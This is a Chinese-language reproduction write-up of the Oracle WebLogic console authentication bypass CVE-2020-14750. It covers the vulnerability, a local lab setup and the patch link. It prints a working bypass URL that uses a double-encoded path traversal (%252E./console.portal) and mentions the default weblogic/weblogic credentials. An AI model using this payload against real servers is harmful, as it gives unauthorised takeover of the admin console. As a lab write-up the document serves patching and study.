0x01 漏洞概述
Oracle Fusion Middleware(Oracle融合中間件)是美國甲骨文(Oracle)公司的一套面向企業和雲環境的業務創新平台。該平台提供了中間件、軟件集合等功能。
Oracle WebLogic Server Oracle Fusion Middleware Console 多版本存在安全漏洞,該漏洞是CVE-2020-14882 補丁的繞過,遠程攻擊者可以構造特殊的 HTTP 請求,在未經身份驗證的情況下接管 WebLogic Server Console ,從而執行任意代碼。
0x02 影響版本
| Oracle:Weblogic :
|
0x03 環境搭建
- windows10 x64
- jdk 1.8.0
- WebLogic 12c
①下載weblogic 12c
https://www.oracle.com/middleware/technologies/fusionmiddleware-downloads.html
②安裝weblogic 12c
1. 使用jdk1.8打開下載的fmw_12.1.3.0.0_wls.jar開始安裝
安裝過程參考了博客
https://www.cnblogs.com/smile502/p/12784978.html
2. 安裝完在目錄下運行startWebLogic.cmd
③啟動完畢后在瀏覽器訪問
0x04 漏洞復現
①觀察正常成功登陸的頁面URL(默認賬號密碼weblogic/weblogic)
http://127.0.0.1:7001/console/console.portal?_nfpb=true&_pageLabel=HomePage1
②構造URL繞過登陸
http://127.0.0.1:7001/console/images/%252E./console.portal
這里的%252E是 . 二次url編碼的結果
成功繞過登陸:
0x05 修復建議
下載官方補丁進行修復
https://www.oracle.com/security-alerts/alert-cve-2020-14750.html